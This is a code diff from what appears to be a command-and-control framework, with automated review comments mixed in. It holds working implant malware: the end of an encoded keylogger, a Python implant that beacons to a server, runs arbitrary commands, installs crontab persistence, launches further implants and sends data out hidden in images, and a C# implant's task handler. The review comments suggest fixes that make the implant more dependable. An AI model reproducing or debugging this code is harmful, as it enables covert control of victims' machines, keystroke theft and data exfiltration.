01zSUNaaWJHOWpheWtOQ2lBZ0lDQWdJQ0FnYzNSeUlEMGdiV1YwYUM1MGIxOXpEUW9nSUNBZ0lDQWdJR3h2ZDJWeUlEMGdjM1J5V3pBc01WMHVaRzkzYm1OaGMyVWdLeUJ6ZEhKYk1TNHVMVEZkRFFvZ0lDQWdJQ0FnSUdsbUlITmxiR1l1Y21WemNHOXVaRjkwYno4Z2JHOTNaWElOQ2lBZ0lDQWdJQ0FnSUNCelpXeG1Mbk5sYm1RZ2JHOTNaWElzSUNwaGNtZHpEUW9nSUNBZ0lDQWdJR1ZzYzJVTkNpQWdJQ0FnSUNBZ0lDQnpkWEJsY2cwS0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lHVnVaQTBLSUNBZ0lHVnVaQTBLSUNCbGJtUU5DbVZ1WkEwS1UwMWZTME5JVWw5RFFVTklSU0E5SURNNERRcFRUVjlEVlZKU1JVNVVYMU5EVWtsUVZDQTlJQzB5RFFwTlFWaGZRVkJRWDA1QlRVVWdQU0E0TUEwS2JXOWtkV3hsSUVOaGNtSnZiZzBLSUNCcFppQnlkV0o1WHpKZk0xOXZjbDlvYVdkb1pYSS9EUW9nSUNBZ1pYaDBaVzVrSUVacFpHUnNaVG82U1cxd2IzSjBaWElOQ2lBZ1pXeHpaUTBLSUNBZ0lHVjRkR1Z1WkNCRVREbzZTVzF3YjNKMFpYSU5DaUFnWlc1a0RRb2dJR1JzYkc5aFpDQW5MMU41YzNSbGJTOU1hV0p5WVhKNUwwWnlZVzFsZDI5eWEzTXZRMkZ5WW05dUxtWnlZVzFsZDI5eWF5OURZWEppYjI0bkRRb2dJR1Y0ZEdWeWJpQW5kVzV6YVdkdVpXUWdiRzl1WnlCRGIzQjVVSEp2WTJWemMwNWhiV1VvWTI5dWMzUWdVSEp2WTJWemMxTmxjbWxoYkU1MWJXSmxjaUFxTENCMmIybGtJQ29wSncwS0lDQmxlSFJsY200Z0ozWnZhV1FnUjJWMFJuSnZiblJRY205alpYTnpLRkJ5YjJObGMzTlRaWEpwWVd4T2RXMWlaWElnS2lrbkRRb2dJR1Y0ZEdWeWJpQW5kbTlwWkNCSFpYUkxaWGx6S0hadmFXUWdLaWtuRFFvZ0lHVjRkR1Z5YmlBbmRXNXphV2R1WldRZ1kyaGhjaUFxUjJWMFUyTnlhWEIwVm1GeWFXRmliR1VvYVc1MExDQnBiblFwSncwS0lDQmxlSFJsY200Z0ozVnVjMmxuYm1Wa0lHTm9ZWElnUzJWNVZISmhibk5zWVhSbEtIWnZhV1FnS2l3Z2FXNTBMQ0IyYjJsa0lDb3BKdzBLSUNCbGVIUmxjbTRnSjNWdWMybG5ibVZrSUdOb1lYSWdRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LSFp2YVdRZ0tpd2dkbTlwWkNBcUxDQnBiblFzSUdsdWRDa25EUW9nSUdWNGRHVnliaUFuYVc1MElFTkdVM1J5YVc1blIyVjBUR1Z1WjNSb0tIWnZhV1FnS2lrbkRRcGxibVFOQ25CemJpQTlJRzFoYkd4dlkzTW9NVFlwRFFwdVlXMWxJRDBnYldGc2JHOWpjeWd4TmlrTkNtNWhiV1ZmWTNOMGNpQTlJRzFoYkd4dlkzTW9UVUZZWDBGUVVGOU9RVTFGS1EwS2EyVjViV0Z3SUQwZ2JXRnNiRzlqY3lneE5pa05Dbk4wWVhSbElEMGdiV0ZzYkc5amN5ZzRLUTBLYVhSMlgzTjBZWEowSUQwZ1ZHbHRaUzV1YjNjdWRHOWZhUTBLY0hKbGRsOWtiM2R1SUQwZ1NHRnphQzV1Wlhjb1ptRnNjMlVwRFFwc1lYTjBWMmx1Wkc5M0lEMGdJaUlOQ25kb2FXeGxJQ2gwY25WbEtTQmtidzBLSUNCRFlYSmliMjR1UjJWMFJuSnZiblJRY205alpYTnpLSEJ6Ymk1eVpXWXBEUW9nSUVOaGNtSnZiaTVEYjNCNVVISnZZM
lZ6YzA1aGJXVW9jSE51TG5KbFppd2dibUZ0WlM1eVpXWXBEUW9nSUVOaGNtSnZiaTVIWlhSTFpYbHpLR3RsZVcxaGNDa05DaUFnYzNSeVgyeGxiaUE5SUVOaGNtSnZiaTVEUmxOMGNtbHVaMGRsZEV4bGJtZDBhQ2h1WVcxbEtRMEtJQ0JqYjNCcFpXUWdQU0JEWVhKaWIyNHVRMFpUZEhKcGJtZEhaWFJEVTNSeWFXNW5LRzVoYldVc0lHNWhiV1ZmWTNOMGNpd2dUVUZZWDBGUVVGOU9RVTFGTENBd2VEQTRNREF3TVRBd0tTQStJREFOQ2lBZ1lYQndYMjVoYldVZ1BTQnBaaUJqYjNCcFpXUWdkR2hsYmlCdVlXMWxYMk56ZEhJdWRHOWZjeUJsYkhObElDZFZibXR1YjNkdUp5QmxibVFOQ2lBZ1lubDBaWE1nUFNCclpYbHRZWEF1ZEc5ZmMzUnlEUW9nSUdOaGNGOW1iR0ZuSUQwZ1ptRnNjMlVOQ2lBZ1lYTmphV2tnUFNBd0RRb2dJR04wY214amFHRnlJRDBnSWlJTkNpQWdLREF1TGk0eE1qZ3BMbVZoWTJnZ1pHOGdmR3Q4RFFvZ0lDQWdhV1lnS0NoaWVYUmxjMXRyUGo0elhTNXZjbVFnUGo0Z0tHc21OeWtwSUNZZ01TQStJREFwRFFvZ0lDQWdJQ0JwWmlCdWIzUWdjSEpsZGw5a2IzZHVXMnRkRFFvZ0lDQWdJQ0FnSUdOaGMyVWdhdzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdNellOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRsYm5SbGNsMGlEUW9nSUNBZ0lDQWdJQ0FnZDJobGJpQTBPQTBLSUNBZ0lDQWdJQ0FnSUNBZ1kzUnliR05vWVhJZ1BTQWlXM1JoWWwwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBME9RMEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaUlDSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXhEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaR1ZzWlhSbFhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVXpEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJaWE5qWFNJTkNpQWdJQ0FnSUNBZ0lDQjNhR1Z1SURVMURRb2dJQ0FnSUNBZ0lDQWdJQ0JqZEhKc1kyaGhjaUE5SUNKYlkyMWtYU0lOQ2lBZ0lDQWdJQ0FnSUNCM2FHVnVJRFUyRFFvZ0lDQWdJQ0FnSUNBZ0lDQmpkSEpzWTJoaGNpQTlJQ0piYzJocFpuUmRJZzBLSUNBZ0lDQWdJQ0FnSUhkb1pXNGdOVGNOQ2lBZ0lDQWdJQ0FnSUNBZ0lHTjBjbXhqYUdGeUlEMGdJbHRqWVhCelhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTREUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJiM0IwYVc5dVhTSU5DaUFnSUNBZ0lDQWdJQ0IzYUdWdUlEVTVEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSmJZM1J5YkYwaURRb2dJQ0FnSUNBZ0lDQWdkMmhsYmlBMk13MEtJQ0FnSUNBZ0lDQWdJQ0FnWTNSeWJHTm9ZWElnUFNBaVcyWnVYU0lOQ2lBZ0lDQWdJQ0FnSUNCbGJITmxEUW9nSUNBZ0lDQWdJQ0FnSUNCamRISnNZMmhoY2lBOUlDSWlEUW9nSUNBZ0lDQWdJR1Z1WkEwS0lDQWdJQ0FnSUNCcFppQmpkSEpzWTJoaGNpQTlQU0FpSWlCaGJtUWdZWE5qYVdrZ1BUMGdNQTBLSUNBZ0lDQWdJQ0FnSUd0amFISWdQU0JEWVhKaWIyNHVSM
lYwVTJOeWFYQjBWbUZ5YVdGaWJHVW9VMDFmUzBOSVVsOURRVU5JUlN3Z1UwMWZRMVZTVWtWT1ZGOVRRMUpKVUZRcERRb2dJQ0FnSUNBZ0lDQWdZM1Z5Y2w5aGMyTnBhU0E5SUVOaGNtSnZiaTVMWlhsVWNtRnVjMnhoZEdVb2EyTm9jaXdnYXl3Z2MzUmhkR1VwRFFvZ0lDQWdJQ0FnSUNBZ1kzVnljbDloYzJOcGFTQTlJR04xY25KZllYTmphV2tnUGo0Z01UWWdhV1lnWTNWeWNsOWhjMk5wYVNBOElERU5DaUFnSUNBZ0lDQWdJQ0J3Y21WMlgyUnZkMjViYTEwZ1BTQjBjblZsRFFvZ0lDQWdJQ0FnSUNBZ2FXWWdZM1Z5Y2w5aGMyTnBhU0E5UFNBd0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqWVhCZlpteGhaeUE5SUhSeWRXVU5DaUFnSUNBZ0lDQWdJQ0JsYkhObERRb2dJQ0FnSUNBZ0lDQWdJQ0JoYzJOcGFTQTlJR04xY25KZllYTmphV2tOQ2lBZ0lDQWdJQ0FnSUNCbGJtUU5DaUFnSUNBZ0lDQWdaV3h6YVdZZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQWdJQ0FnSUNCd2NtVjJYMlJ2ZDI1YmExMGdQU0IwY25WbERRb2dJQ0FnSUNBZ0lHVnVaQTBLSUNBZ0lDQWdaVzVrRFFvZ0lDQWdaV3h6WlEwS0lDQWdJQ0FnY0hKbGRsOWtiM2R1VzJ0ZElEMGdabUZzYzJVTkNpQWdJQ0JsYm1RTkNpQWdaVzVrRFFvZ0lHbG1JR0Z6WTJscElDRTlJREFnYjNJZ1kzUnliR05vWVhJZ0lUMGdJaUlOQ2lBZ0lDQnBaaUJoY0hCZmJtRnRaU0FoUFNCc1lYTjBWMmx1Wkc5M0RRb2dJQ0FnSUNCd2RYUnpJQ0pjYmx4dVd5TjdZWEJ3WDI1aGJXVjlYU0F0SUZzamUxUnBiV1V1Ym05M2ZWMWNiaUlOQ2lBZ0lDQWdJR3hoYzNSWGFXNWtiM2NnUFNCaGNIQmZibUZ0WlEwS0lDQWdJR1Z1WkEwS0lDQWdJR2xtSUdOMGNteGphR0Z5SUNFOUlDSWlEUW9nSUNBZ0lDQndjbWx1ZENBaUkzdGpkSEpzWTJoaGNuMGlEUW9nSUNBZ1pXeHphV1lnWVhOamFXa2dQaUF6TWlCaGJtUWdZWE5qYVdrZ1BDQXhNamNOQ2lBZ0lDQWdJR01nUFNCcFppQmpZWEJmWm14aFp5QjBhR1Z1SUdGelkybHBMbU5vY2k1MWNHTmhjMlVnWld4elpTQmhjMk5wYVM1amFISWdaVzVrRFFvZ0lDQWdJQ0J3Y21sdWRDQWlJM3RqZlNJTkNpQWdJQ0JsYkhObERRb2dJQ0FnSUNCd2NtbHVkQ0FpV3lON1lYTmphV2w5WFNJTkNpQWdJQ0JsYm1RTkNpQWdJQ0FrYzNSa2IzVjBMbVpzZFhOb0RRb2dJR1Z1WkEwS0lDQkxaWEp1Wld3dWMyeGxaWEFvTUM0d01Ta05DbVZ1WkEwS0RRbz1cJykpIiB8IHJ1YnkgPiAlcyAyPiYxICYnICUgZmlsZW5hbWUpLnJlYWQoKQp0aW1lLnNsZWVwKDEpCg==" + modb64logger = base64.b64decode(b64logger) + modpayload = modb64logger.replace("REPLACEME",filename) + exec(modpayload) + pids = os.popen('ps aux | grep " ruby" | grep -v grep').read() + returnval = "%%s \\r\\nKeylogger started here: %%s" %% (pids, filename) + return returnval + +def dfile(fname): + if fname: + with open(fname, 
"rb") as image_file: + imgbytes = image_file.read() + return "0000100001" + imgbytes + +def ufile(base64file, fname): + fname = fname.replace('"','') + filebytes = base64.b64decode(base64file) + try: + output_file = open(fname, 'w') + output_file.write(filebytes) + output_file.close() + return "Uploaded file %%s" %% fname + except Exception as e: + return "Error with source file: %%s" %% e + +def sai(delfile=False): + import uuid + filename = "/tmp/%%s.sh" %% (uuid.uuid4().hex) + imfull = base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess + returnval = "Ran Start Another Implant - File dropped: %%s" %% filename + p = subprocess.Popen(["sh", filename]) + if delfile: + p = subprocess.Popen(["rm", filename]) + returnval = "Ran Start Another Implant - File removed: %%s" %% filename + return returnval + +def persist(): + import uuid, os + dircontent = "%%s/.%%s" %% (os.environ['HOME'], uuid.uuid4().hex) + os.mkdir(dircontent) + filename = "%%s/%%s_psh.sh" %% (dircontent, uuid.uuid4().hex) + imfull = base64.b64decode(imbase) + output_file = open(filename, 'w') + output_file.write(imfull) + output_file.close() + import subprocess as s + s.call("crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -" %% filename, shell=True) + return "Installing persistence via user crontab everyday at 10am: \\r\\n%%s" %% filename + +def remove_persist(): + import subprocess as s + s.call("crontab -l | { cat; } | grep -v '_psh.sh'| crontab -", shell=True) + return "Removed user persistence via crontab: \\r\\n**must delete files manually**" + +def decrypt_bytes_gzip( key, data): + iv = data[0:16] + aes = get_encryption(key, iv) + data = aes.decrypt( data ) + import StringIO + import gzip + infile = StringIO.StringIO(data[16:]) + with gzip.GzipFile(fileobj=infile, mode="r") as f: + data = f.read() + return data + +while(True): + 
cstr=time.strftime("%%d/%%m/%%Y",time.gmtime());cstr=time.strptime(cstr,"%%d/%%m/%%Y") + if cstr < kd: + key = "%s" + uri = "%s" + server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + try: + time.sleep(timer) + ua='%s' + if hh: req=urllib2.Request(server,headers={'Host':hh,'User-agent':ua}) + else: req=urllib2.Request(server,headers={'User-agent':ua}) + res=urllib2.urlopen(req); + html = res.read() + except Exception as e: + E = e + #print "error %%s" %% e + #print html + if html: + try: + returncmd = decrypt( key, html ) + returncmd = returncmd.rstrip('\\0') + + if "multicmd" in returncmd: + + returncmd = returncmd.replace("multicmd","") + returnval = "" + splits = returncmd.split("!d-3dion@LD!-d") + + for split in splits: + taskId = split[:5].strip().strip('\x00') + cmd = split[5:].strip().strip('\x00') + if cmd[:10] == "$sleeptime": + timer = int(cmd.replace("$sleeptime = ","")) + elif cmd[:13] == "download-file": + fname = cmd.replace("download-file ","") + returnval = dfile(fname) + elif cmd[:11] == "upload-file": + fullparams = cmd.replace("upload-file ","") + params = fullparams.split(":") + returnval = ufile(params[1],params[0]) + elif cmd[:19] == "install-persistence": + returnval = persist() + elif cmd[:14] == "get-keystrokes": + returnval = keylog() + elif cmd[:18] == "remove-persistence": + returnval = remove_persist() + elif cmd[:19] == "startanotherimplant": + returnval = sai(delfile=True) + elif cmd[:28] == "startanotherimplant-keepfile": + returnval = sai() + elif cmd[:10] == "loadmodule": + module = cmd.replace("loadmodule","") + exec(module) + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + if s.getvalue(): + returnval = s.getvalue() + else: + returnval = "Module loaded" + except Exception as e: + 
returnval = "Error with source file: %%s" %% e + + elif cmd.startswith("linuxprivchecker"): + args = cmd[len('linuxprivchecker'):].strip() + args = args.split() + pycode_index = args.index('-pycode') + encoded_module = args[pycode_index +1] + args.pop(pycode_index) + args.pop(pycode_index) + pycode = base64.b64decode(encoded_module) + process = ['python', '-c', pycode] + pycode = 'import sys; sys.argv = sys.argv[1:];' + pycode + import subprocess + returnval = subprocess.check_output(['python', '-c', pycode] + args) + + elif cmd[:6] == "python": + module = cmd.replace("python ","") + try: + import sys + import StringIO + import contextlib + + @contextlib.contextmanager + def stdoutIO(stdout=None): + old = sys.stdout + if stdout is None: + stdout = StringIO.StringIO() + sys.stdout = stdout + yield stdout + sys.stdout = old + + with stdoutIO() as s: + exec module + + returnval = s.getvalue() + + except Exception as e: + returnval = "Error with source file: %%s" %% e + + else: + try: + returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) + except subprocess.CalledProcessError as exc: + returnval = "ErrorCmd: %%s" %% exc.output + + server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) + opener = urllib2.build_opener() + postcookie = encrypt(key, taskId) + data = base64.b64decode(random.choice(icoimage)) + dataimage = data.ljust( 1500, '\x00' ) + dataimagebytes = dataimage+(encrypt(key, returnval, gzip=True)) + if hh: req=urllib2.Request(server,dataimagebytes,headers={'Host':hh,'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + else: req=urllib2.Request(server,dataimagebytes,headers={'User-agent':ua,'Cookie':"SessionID=%%s" %% postcookie}) + res=urllib2.urlopen(req); + response = res.read() + + except Exception as e: + E = e + # print "error %%s" %% e \ No newline at end of file diff --git a/Files/Sharp.cs b/Files/Sharp.cs index 3718a8d..f871eb6 100644 --- a/Files/Sharp.cs +++ b/Files/Sharp.cs 
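Review bot: Once the kill date passes, the `while(True)` loop has no branch for `cstr < kd` being false, so the implant spins at full CPU forever instead of exiting; add `else: break` after the `if cstr < kd:` body (or `sys.exit()`) so it actually stops. In the `loadmodule` branch the module is executed twice, once by the bare `exec(module)` and again by `exec module` inside `stdoutIO()`, so any side effects run twice and the first run's output is lost; drop the first `exec(module)`. `if html:` sits after the request's try/except, so if the very first poll fails `html` is unbound and the NameError ends the implant; initialise `html = None` before the `try`. `serverclean`, `decrypt`, `encrypt` and `get_encryption` are referenced but not defined in this file, presumably supplied by the template that embeds it.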
@@ -376,51 +376,53 @@ public class Program var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries); foreach (string c in split) { - tasksrc = c; - if (c.ToLower().StartsWith("exit")) + var taskId = c.Substring(0, 5); + cmd = c.Substring(5, c.Length - 5); + tasksrc = cmd; + if (cmd.ToLower().StartsWith("exit")) { exitvt.Set(); break; } - else if (c.ToLower().StartsWith("loadmodule")) + else if (cmd.ToLower().StartsWith("loadmodule")) { - var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase); + var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase); var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module)); output.AppendLine("Module loaded sucessfully"); - tasksrc = "Module loaded sucessfully"; } - else if (c.ToLower().StartsWith("upload-file")) + else if (cmd.ToLower().StartsWith("upload-file")) { - var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase); + var path = Regex.Replace(cmd, "upload-file", "", RegexOptions.IgnoreCase); var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries); Console.WriteLine("Uploaded file to: " + splitargs[1]); var fileBytes = Convert.FromBase64String(splitargs[0]); System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes); tasksrc = "Uploaded file sucessfully"; } - else if (c.ToLower().StartsWith("download-file")) + else if (cmd.ToLower().StartsWith("download-file")) { - var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase); + var path = Regex.Replace(cmd, "download-file ", "", RegexOptions.IgnoreCase); var file = File.ReadAllBytes(path.Replace("\"", "")); var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file); - var dtask = Encryption(Key, c); + var eTaskId = Encryption(Key, taskId); var dcoutput = Encryption(Key, "", true, fileChuck); var doutputBytes = System.Convert.FromBase64String(dcoutput); var dsendBytes = 
ImgGen.GetImgData(doutputBytes); - GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes); + GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes); + continue; } - else if (c.ToLower().StartsWith("get-screenshotmulti")) + else if (cmd.ToLower().StartsWith("get-screenshotmulti")) { bool sShot = true; int sShotCount = 1; while(sShot) { var sHot = RunAssembly("run-exe Core.Program Core get-screenshot"); - var dtask = Encryption(Key, c); + var eTaskId = Encryption(Key, taskId); var dcoutput = Encryption(Key, strOutput.ToString(), true); var doutputBytes = System.Convert.FromBase64String(dcoutput); var dsendBytes = ImgGen.GetImgData(doutputBytes); - GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes); + GetWebRequest(eTaskId).UploadData(UrlGen.GenerateUrl(), dsendBytes); Thread.Sleep(240000); sShotCount++; if (sShotCount > 100) { @@ -431,21 +433,22 @@ public class Program output.Append("[+] Multi Screenshot Ran Sucessfully"); } } + continue; } - else if (c.ToLower().StartsWith("listmodules")) + else if (cmd.ToLower().StartsWith("listmodules")) { var appd = AppDomain.CurrentDomain.GetAssemblies(); output.AppendLine("[+] Modules loaded:").AppendLine(""); foreach (var ass in appd) output.AppendLine(ass.FullName.ToString()); } - else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")) + else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe")) { - output.AppendLine(RunAssembly(c)); + output.AppendLine(RunAssembly(cmd)); } - else if (c.ToLower().StartsWith("start-process")) + else if (cmd.ToLower().StartsWith("start-process")) { - var proc = c.Replace("'", "").Replace("\"", ""); + var proc = cmd.Replace("'", "").Replace("\"", ""); var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase); pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase); var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase); 
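Review bot: `var taskId = c.Substring(0, 5); cmd = c.Substring(5, c.Length - 5);` at the top of the foreach throws ArgumentOutOfRangeException for any split entry shorter than five characters, and since the catch that handles it sits outside the loop (in a later hunk) one malformed entry aborts the remaining tasks of the multicmd batch and reports them under the generic "Error" cookie rather than a task ID. `StringSplitOptions.RemoveEmptyEntries` only drops empty strings, so a short token after a stray delimiter still reaches the slice, whereas the Python implant's `split[:5]` in this same commit tolerates it. A guard before the slice keeps the rest of the batch alive: `if (c.Length < 5) { output.AppendLine("[-] Skipping malformed task entry"); continue; }`, and `c.Substring(5)` is the idiomatic spelling of the second call. The enclosing try begins before this hunk.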
@@ -458,7 +461,7 @@ public class Program output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd()); p.WaitForExit(); } - else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) + else if (cmd.ToLower().StartsWith("setbeacon") || cmd.ToLower().StartsWith("beacon")) { var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?[0-9]{1,9})(?[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase); var mch = bcnRgx.Match(c); @@ -482,19 +485,19 @@ public class Program output.AppendLine(strOutput.ToString()); var sb = strOutput.GetStringBuilder(); sb.Remove(0, sb.Length); - if (tasksrc.Length > 200) + if (tasksrc.Length > 200) // This is not used? tasksrc = tasksrc.Substring(0, 199); - var task = Encryption(Key, tasksrc); + var enTaskId = Encryption(Key, taskId); var coutput = Encryption(Key, output.ToString(), true); var outputBytes = System.Convert.FromBase64String(coutput); var sendBytes = ImgGen.GetImgData(outputBytes); - GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes); + GetWebRequest(enTaskId).UploadData(UrlGen.GenerateUrl(), sendBytes); } } } catch (Exception e) { - var task = Encryption(Key, "Error"); + var task = Encryption(Key, "Error"); var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true); var outputBytes = System.Convert.FromBase64String(eroutput); var sendBytes = ImgGen.GetImgData(outputBytes); diff --git a/HTML.py b/HTML.py index 66fb532..7dada64 100644 --- a/HTML.py +++ b/HTML.py 
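Review bot: The setbeacon branch now dispatches on `cmd` but still runs `var mch = bcnRgx.Match(c);` against the unsliced entry, i.e. the five-character task ID plus the command. The lookbehind on `setbeacon|beacon` most likely still locates the interval, but this is the only branch in the loop that mixes `c` and `cmd`, and a later change to the prefix format would break it silently; match on the command as the other branches do: `var mch = bcnRgx.Match(cmd);`.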
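Review bot: The catch still uploads `Encryption(Key, "Error")` with no task ID, so a failure cannot be attributed to the task that caused it even though every success path now sends `Encryption(Key, taskId)`; because `taskId` is declared with `var` inside the foreach it is out of scope here, so declaring `string taskId = "";` before the try and sending `Encryption(Key, "Error" + taskId)` would let the server correlate the failure, provided its error check only tests the prefix. The truncation `if (tasksrc.Length > 200) tasksrc = tasksrc.Substring(0, 199);` is dead once the cookie carries the task ID, and shipping the author's `// This is not used?` question in the code is worse than either removing the two lines or leaving a comment stating why they stay. I cannot see other readers of tasksrc outside this hunk, so confirm before deleting.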
@@ -209,8 +209,8 @@ function SearchTask() { function tweakMarkup(){ // Add classes to columns - var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] - //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + var classes = ['id', 'taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + //var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] tbl = document.getElementById("PoshTable"); ths = tbl.getElementsByTagName("th"); for( i=0; i'; td.onclick = toggleHide @@ -333,7 +333,7 @@ table { table tr th.randomuri { width: 15%; } - table tr th.prompt { + table tr th.user { width: 10%; } @@ -355,7 +355,7 @@ __________ .__. _________ ________ """ - if table == "CompletedTasks": + if table == "Tasks": HTMLPre += """ @@ -372,13 +372,13 @@ __________ .__. _________ ________ frame = pd.read_sql_query("SELECT * FROM %s" % table, conn) # encode the Output column - if table == "CompletedTasks": + if table == "Tasks": for index, row in frame.iterrows(): frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"])) frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"])) # convert the random uri to original hostname - if table == "CompletedTasks": + if table == "Tasks": framelen = frame['RandomURI'].count() for x in range(0, framelen): try: 
@@ -404,7 +404,7 @@ __________ .__. _________ ________ HTMLPost = HTMLPost.replace("RandomURI","RandomURI") HTMLPost = HTMLPost.replace("Command","Command") HTMLPost = HTMLPost.replace("Output","Output") - HTMLPost = HTMLPost.replace("Prompt","Prompt") + HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("ImplantID","ImplantID") HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("Hostname","Hostname") diff --git a/Implant.py b/Implant.py index 29d58db..461dde5 100644 --- a/Implant.py +++ b/Implant.py 
@@ -41,516 +41,10 @@ NEWKEY8839394%s4939388YEKWEN IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages) with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f: self.PythonImplant = base64.b64encode(f.read()) - self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random -hh = '%s' -timer = %s -icoimage = [%s] -urls = [%s] -kd=time.strptime("%s","%%d/%%m/%%Y") -useragent = "" -imbase = "%s" - -def keylog(): - # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/modules/python/collection/osx/keylogger.py - import os,time,base64,subprocess,uuid - filename = "/tmp/%%s" %% uuid.uuid4().hex - b64logger = "aW1wb3J0IG9zLHRpbWUKZmlsZW5hbWUgPSAiUkVQTEFDRU1FIgpvdXRwdXQgPSBvcy5wb3BlbignZWNobyAicmVxdWlyZSBcJ2Jhc2U2NFwnO2V2YWwoQmFzZTY0LmRlY29kZTY0KFwnWkdWbUlISjFZbmxmTVY4NVgyOXlYMmhwWjJobGNqOE5DaUFnVWxWQ1dWOVdSVkpUU1U5T0xuUnZYMllnUGowZ01TNDVJQ1ltSUZKVlFsbGZWa1ZTVTBsUFRpNTBiMTltUERJdU13MEtaVzVrRFFwa1pXWWdjblZpZVY4eVh6TmZiM0pmYUdsbmFHVnlQdzBLSUNCU1ZVSlpYMVpGVWxOSlQwNHVkRzlmWmlBK1BTQXlMak1OQ21WdVpBMEtjbVZ4ZFdseVpTQW5kR2h5WldGa0p3MEtjbVZ4ZFdseVpTQW5abWxrWkd4bEp5QnBaaUJ5ZFdKNVh6SmZNMTl2Y2w5b2FXZG9aWEkvRFFweVpYRjFhWEpsSUNkbWFXUmtiR1V2YVcxd2IzSjBKeUJwWmlCeWRXSjVYekpmTTE5dmNsOW9hV2RvWlhJL0RRcHlaWEYxYVhKbElDZGtiQ2NnYVdZZ2JtOTBJSEoxWW5sZk1sOHpYMjl5WDJocFoyaGxjajhOQ25KbGNYVnBjbVVnSjJSc0wybHRjRzl5ZENjZ2FXWWdibTkwSUhKMVlubGZNbDh6WDI5eVgyaHBaMmhsY2o4TkNrbHRjRzl5ZEdWeUlEMGdhV1lnWkdWbWFXNWxaRDhvUkV3Nk9rbHRjRzl5ZEdWeUtTQjBhR1Z1SUdWNGRHVnVaQ0JFVERvNlNXMXdiM0owWlhJZ1pXeHphV1lnWkdWbWFXNWxaRDhvUm1sa1pHeGxPanBKYlhCdmNuUmxjaWtnZEdobGJpQmxlSFJsYm1RZ1JtbGtaR3hsT2pwSmJYQnZjblJsY2lCbGJITmxJRVJNT2pwSmJYQnZjblJoWW14bElHVnVaQTBLWkdWbUlHMWhiR3h2WT